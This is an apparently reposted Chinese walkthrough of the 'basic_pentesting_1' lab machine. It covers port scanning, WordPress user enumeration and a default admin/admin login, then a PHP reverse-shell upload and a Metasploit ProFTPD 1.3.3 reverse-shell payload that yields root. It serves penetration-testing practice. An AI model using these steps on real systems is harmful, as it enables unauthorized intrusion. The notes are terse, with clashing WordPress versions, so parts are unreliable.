靶机来源-basic_pentesting_1【VX订阅号:0x00实验室】

basic_pentesting_1【VX订阅号:0x00实验室】

arp-scan扫描靶机IP
靶机来源-basic_pentesting_1【VX订阅号:0x00实验室】_第1张图片
masscan 192.168.253.153 --ports 0-65535 --rate=10000端口扫描
靶机来源-basic_pentesting_1【VX订阅号:0x00实验室】_第2张图片
nmap扫描nmap -T5 -A -p- 192.168.253.153
21:ProFTPD 1.3.3
靶机来源-basic_pentesting_1【VX订阅号:0x00实验室】_第3张图片

dirb http://192.168.253.153 目录扫描
靶机来源-basic_pentesting_1【VX订阅号:0x00实验室】_第4张图片
http://192.168.253.153/secret/发现网站cms是wordpress
靶机来源-basic_pentesting_1【VX订阅号:0x00实验室】_第5张图片
wpscan --url http://192.168.253.153/secret/
靶机来源-basic_pentesting_1【VX订阅号:0x00实验室】_第6张图片
知道版本WordPress 4.9.24
msf没发现可利用漏洞
wpscan --url http://192.168.253.153/secret/ --enumerate u用户名枚举
靶机来源-basic_pentesting_1【VX订阅号:0x00实验室】_第7张图片
admin/admin直接进来了
404界面写入phpshell
shell:反弹的phpwebshellphp-reverse-shell.php 默认目录及文件名/usr/share/webshells/php

靶机来源-basic_pentesting_1【VX订阅号:0x00实验室】_第8张图片
把IP和port改成自己的,监听反弹
404监听不行,监听不到
WordPress 6.4.1
上传可以
在上传路径找到自己上传文件
靶机来源-basic_pentesting_1【VX订阅号:0x00实验室】_第9张图片
靶机来源-basic_pentesting_1【VX订阅号:0x00实验室】_第10张图片

换个方法
ftp端口开着
ProFTPD
搜索可利用模块search ProFTPD 1.3.3
靶机来源-basic_pentesting_1【VX订阅号:0x00实验室】_第11张图片
设置payload,输入set payload cmd/unix/reverse、

设置目的地址和源地址
靶机来源-basic_pentesting_1【VX订阅号:0x00实验室】_第12张图片
运行
靶机来源-basic_pentesting_1【VX订阅号:0x00实验室】_第13张图片
获得root权限

你可能感兴趣的:(靶机,网络,安全,靶机,渗透测试)